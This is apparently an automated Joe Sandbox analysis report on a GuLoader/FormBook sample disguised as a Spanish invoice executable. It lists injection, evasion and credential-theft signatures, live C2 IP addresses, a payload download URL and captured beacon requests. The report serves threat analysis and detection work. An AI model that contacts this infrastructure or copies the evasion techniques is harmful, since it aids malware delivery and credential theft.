Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURA PROFORMA MATRICULACI#U00d3N.exe

Overview

General Information

Sample name:FACTURA PROFORMA MATRICULACI#U00d3N.exe
Analysis ID:1592061
MD5:66d651e5546dedafd0a252400b70c21d
SHA1:e7d2f22f36489ab390a293bc9e0b048df09675f1
SHA256:94df904f108f2aa1f8ffdbe2d119ac899fe12e664057792c51662878fdeb21ec
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • FACTURA PROFORMA MATRICULACI#U00d3N.exe (PID: 3248 cmdline: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe" MD5: 66D651E5546DEDAFD0A252400B70C21D)
    • FACTURA PROFORMA MATRICULACI#U00d3N.exe (PID: 1600 cmdline: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe" MD5: 66D651E5546DEDAFD0A252400B70C21D)
      • RAVCpl64.exe (PID: 6480 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • rasphone.exe (PID: 4548 cmdline: "C:\Windows\SysWOW64\rasphone.exe" MD5: B5D49238841360E079DA1EC4627684EA)
          • firefox.exe (PID: 524 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.CirJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.84398186443.0000000001660000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.84200771924.0000000004EB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000000.00000003.83100054536.00000000029FF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 2 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-15T18:20:23.968838+010028032702Potentially Bad Traffic192.168.11.2049762212.162.149.16580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-15T18:20:58.019349+010028554651A Network Trojan was detected192.168.11.204976367.223.117.18980TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeAvira: detected
              Multi AV Scanner detection for submitted file
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeReversingLabs: Detection: 21%
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeVirustotal: Detection: 25%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: wntdll.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rasphone.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rasphone.pdbGCTL source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mshtml.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 4x nop then mov ebx, 00000004h2_2_3643052F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_006DC52F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_04912F18
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4x nop then mov ebx, 00000004h4_2_04C1052F

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 67.223.117.189:80
              Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
              Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49762 -> 212.162.149.165:80
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: global trafficHTTP traffic detected: GET /psKGLMYRljeu25.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 212.162.149.165Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9 HTTP/1.1Host: www.flourishno.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
              Source: global trafficDNS traffic detected: DNS query: www.fullhdfilmizlesene.uno
              Source: global trafficDNS traffic detected: DNS query: www.brunokito.cloud
              Source: global trafficDNS traffic detected: DNS query: www.flourishno.life
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:20:57 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/Q
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bin
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bin9
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.binE
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bino
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.binu
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096597469.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196408647.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
              Source: RAVCpl64.exe, 00000003.00000002.88184446311.0000000005CB8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
              Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: rasphone.exe, 00000004.00000003.84675419748.00000000079FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367734E0 NtCreateMutant,LdrInitializeThunk,2_2_367734E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_36772EB0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_36772D10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772A80 NtClose,LdrInitializeThunk,2_2_36772A80
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_36772BC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_36772B90
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36774570 NtSuspendThread,2_2_36774570
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36774260 NtSetContextThread,2_2_36774260
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772E50 NtCreateSection,2_2_36772E50
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772E00 NtQueueApcThread,2_2_36772E00
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772ED0 NtResumeThread,2_2_36772ED0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772EC0 NtQuerySection,2_2_36772EC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772E80 NtCreateProcessEx,2_2_36772E80
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772F30 NtOpenDirectoryObject,2_2_36772F30
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772F00 NtCreateFile,2_2_36772F00
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772FB0 NtSetValueKey,2_2_36772FB0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772C50 NtUnmapViewOfSection,2_2_36772C50
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36773C30 NtOpenProcessToken,2_2_36773C30
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772C30 NtMapViewOfSection,2_2_36772C30
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772C20 NtSetInformationFile,2_2_36772C20
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772C10 NtOpenProcess,2_2_36772C10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772CF0 NtDelayExecution,2_2_36772CF0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772CD0 NtEnumerateKey,2_2_36772CD0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36773C90 NtOpenThread,2_2_36773C90
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772D50 NtWriteVirtualMemory,2_2_36772D50
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772DC0 NtAdjustPrivilegesToken,2_2_36772DC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772DA0 NtReadVirtualMemory,2_2_36772DA0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772A10 NtWriteFile,2_2_36772A10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772AC0 NtEnumerateValueKey,2_2_36772AC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772AA0 NtQueryInformationFile,2_2_36772AA0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B20 NtQueryInformationProcess,2_2_36772B20
